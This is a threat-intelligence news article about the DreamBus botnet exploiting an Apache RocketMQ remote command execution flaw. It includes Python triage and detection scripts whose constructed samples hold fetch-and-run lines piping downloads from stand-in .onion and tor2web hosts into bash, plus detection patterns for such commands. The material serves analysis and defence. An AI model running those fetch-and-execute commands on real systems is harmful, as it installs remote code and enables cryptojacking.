DreamBus Botnet Exploiting RCE Flaw in Apache RocketMQ Servers
A vulnerability affecting Apache RocketMQ servers was publicly disclosed in May 2023, allowing remote command execution on exposed instances. RocketMQ is a cloud-native platform for messaging and streaming.
The command execution vulnerability affects RocketMQ versions 5.1.0 and below.
A remote, unauthenticated attacker can exploit it by abusing the update configuration function to execute commands with the same privilege level as the system user RocketMQ runs as. It has been assigned CVE-2023-33246. The fixed releases are 5.1.1 for the 5.x line and 4.9.6 for the 4.x line; in addition, the NameServer (default port 9876) and Broker (default port 10911) should never be reachable from the internet, since the affected components perform no permission check on these requests.
Juniper Threat Labs shed light on these attacks, detecting a pattern in which threat actors leveraged the vulnerability to infiltrate systems.
Remarkably, these intrusions culminated in the installation of the notorious DreamBus bot, a malware strain that re-emerged after lying dormant since 2021.
Mapping the Attack Timeline
Beginning in early June, cybercriminals launched attacks against the RocketMQ vulnerability, with the intensity peaking in mid-June.
Juniper Threat Labs observed that the earliest probes used 'interactsh', an open-source out-of-band interaction tool, to gather reconnaissance data while keeping the activity covert.
On June 19th, a series of attacks emerged that involved downloading and executing a malicious bash script named "reketed."
On the same day, threat actors exhibited two methods for retrieving and executing this shell script.
In one scenario, a TOR proxy service named "tor2web.in" facilitated anonymous downloading.
In the other, the attackers fetched the script from a direct IP address.
DreamBus's Expanded Arsenal
The downloaded payload, the "reketed" bash script, carried the SHA-256 hash 1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047.
Intriguingly, this file had no VirusTotal (VT) detections at the time of analysis.
The "reketed" script orchestrated the download of the DreamBus main module from a TOR hidden service.
(The DreamBus botnet is malware that delivers a cryptocurrency miner to infected computers.)
The DreamBus main module, an ELF binary, surfaced after a successful download.
It posed challenges with its modified UPX headers, which foil the standard UPX unpacking process (the stock upx -d tool refuses to unpack a file whose headers it cannot validate, so the packed file has to be repaired or unpacked manually before analysis).
Once unpacked, the module was found to contain multiple base64-encoded strings, each corresponding to a specific functionality.
Decoding the base64 strings revealed a bash script similar to "reketed," endowed with various capabilities.
These scripts performed various functions, from downloading further modules to mining Monero cryptocurrency.
They communicated over the TOR network, using URL paths such as "/ping," "/mine," and "/cmd1."
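The decoding step described above is a routine triage task: once the module is unpacked, long base64 runs are pulled out of the binary, decoded, and kept only when the result looks like a shell script. The following is an added example written for this article, not code from Juniper Threat Labs or from the DreamBus sample. The blob it scans is constructed here (a fake ELF header, some noise, and a made-up stand-in script that merely mimics the shape described, with ".onion" paths "/ping", "/mine" and "/cmd1"); the hidden-service hostname and the script contents are assumptions for illustration only.

```python
import base64
import re

# Constructed stand-in for a decoded DreamBus-style script. It is NOT the real
# "reketed" script; it only mirrors the traits the article describes: bash,
# TOR transport via a local SOCKS proxy, and paths like /ping, /mine, /cmd1.
SAMPLE_SCRIPT = b"""#!/bin/bash
# constructed example script, not real malware
T="--socks5-hostname 127.0.0.1:9050"
curl -s $T http://example.onion/ping
curl -s $T http://example.onion/mine -o /tmp/m && chmod +x /tmp/m
curl -s $T http://example.onion/cmd1 | bash
"""

# Constructed binary blob standing in for the unpacked ELF module.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9              # fake ELF header bytes
    + b"some_unrelated_string\x00"                      # ordinary string: ignored
    + base64.b64encode(SAMPLE_SCRIPT) + b"\x00"         # the embedded script
    + b"QUJD\x00"                                       # short base64 ("ABC"): too short
    + base64.b64encode(b"\x01\x02\x03\xff" * 20) + b"\x00"  # base64 of binary junk
)

# Anything a decoded blob must contain before we call it a shell script.
SHELL_MARKERS = (b"#!/bin/sh", b"#!/bin/bash", b"curl ", b"wget ", b"/bin/bash")


def extract_base64_scripts(blob: bytes, min_len: int = 40):
    """Return every base64 run in `blob` that decodes to shell-script-like text."""
    run = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    found = []
    for m in run.finditer(blob):
        chunk = m.group(0)
        chunk += b"=" * (-len(chunk) % 4)      # re-pad slightly truncated runs
        try:
            decoded = base64.b64decode(chunk, validate=True)
        except ValueError:                      # binascii.Error is a ValueError
            continue
        if not any(marker in decoded for marker in SHELL_MARKERS):
            continue                            # base64 of binary data: skip
        found.append({"offset": m.start(), "script": decoded})
    return found


# URL path component that directly follows a .onion hostname.
TOR_PATH = re.compile(rb"\.onion(/[A-Za-z0-9_]+)")


def tor_paths(script: bytes):
    """Unique hidden-service paths referenced by a decoded script, sorted."""
    return sorted({p.decode() for p in TOR_PATH.findall(script)})


if __name__ == "__main__":
    for hit in extract_base64_scripts(SAMPLE_BLOB):
        print(f"script at offset {hit['offset']}: paths {tor_paths(hit['script'])}")
```

Run it against the unpacked binary rather than the packed one: the base64 runs only exist in clear once the UPX layer is gone, which is exactly why the modified headers matter. The marker list is deliberately small; widen it to whatever strings your sample uses before trusting a negative result.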
The Web of Persistence and Monero Mining
To ensure a sustained presence, the DreamBus malware employed a multi-pronged approach.
Systemd timer units, cron jobs, and IT automation tools fueled its persistence, allowing the cybercriminals to maintain their foothold.
Additionally, the malware deployed the XMRig Monero cryptocurrency miner, tunnelling its traffic through TOR, to pursue the operators' illicit goal of mining at the victim's expense.
The symbiotic relationship between the RocketMQ vulnerability and the DreamBus bot underscores the inherent dangers of unpatched, internet-exposed systems.
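A defender responding to this campaign would want to sweep the persistence locations named above. The script below is an added example for this article, not tooling from Juniper Threat Labs or from the original page. It scans crontab text and systemd unit files for the traits the article attributes to DreamBus (tor2web and .onion references, downloads piped straight into a shell, executables under hidden /tmp directories, miner strings). The crontab and unit contents it runs on are constructed here for illustration; in practice the same functions would be fed the contents of /var/spool/cron/crontabs/*, /etc/cron.d/* and /etc/systemd/system/*.

```python
import re

# Constructed sample artefacts (not real DreamBus persistence entries).
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update -q
*/5 * * * * curl -s http://tor2web.example/abc.onion/cmd1 | bash
@reboot /tmp/.x/m --url http://127.0.0.1:9050
"""

SAMPLE_SYSTEMD_UNITS = {
    "/etc/systemd/system/logrotate.timer":
        "[Unit]\nDescription=Daily rotation of log files\n"
        "[Timer]\nOnCalendar=daily\n[Install]\nWantedBy=timers.target\n",
    "/etc/systemd/system/sys-update.service":
        "[Unit]\nDescription=System update\n"
        "[Service]\nExecStart=/bin/bash -c 'curl -s http://example.onion/mine | bash'\n",
}

# Each rule: (pattern, human-readable reason). Tune these to your environment.
SUSPICIOUS = [
    (re.compile(r"\.onion\b"), "tor hidden service reference"),
    (re.compile(r"tor2web", re.I), "tor2web proxy reference"),
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"(^|\s)/tmp/\.[^\s/]+"), "executable under a hidden /tmp directory"),
    (re.compile(r"(xmrig|stratum\+tcp)", re.I), "miner artefact"),
]


def scan_text(text: str, source: str):
    """Return one finding per non-comment line that trips at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = [why for rx, why in SUSPICIOUS if rx.search(line)]
        if reasons:
            findings.append({"source": source, "line": lineno,
                             "text": line, "reasons": reasons})
    return findings


def hunt(crontab_text: str, units: dict):
    """Scan a crontab dump plus a {path: contents} map of systemd unit files."""
    findings = scan_text(crontab_text, "crontab")
    for path, content in units.items():
        findings.extend(scan_text(content, path))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_CRONTAB, SAMPLE_SYSTEMD_UNITS):
        print(f"{f['source']}:{f['line']}: {', '.join(f['reasons'])}\n    {f['text']}")
```

The rules are indicators, not proof: a legitimate job that pipes curl into sh will trip the third rule, so each hit still needs a human look at the referenced path or URL. Timer units are scanned exactly like services, because a harmless-looking .timer can simply schedule a malicious .service.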
Source credit : cybersecuritynews.com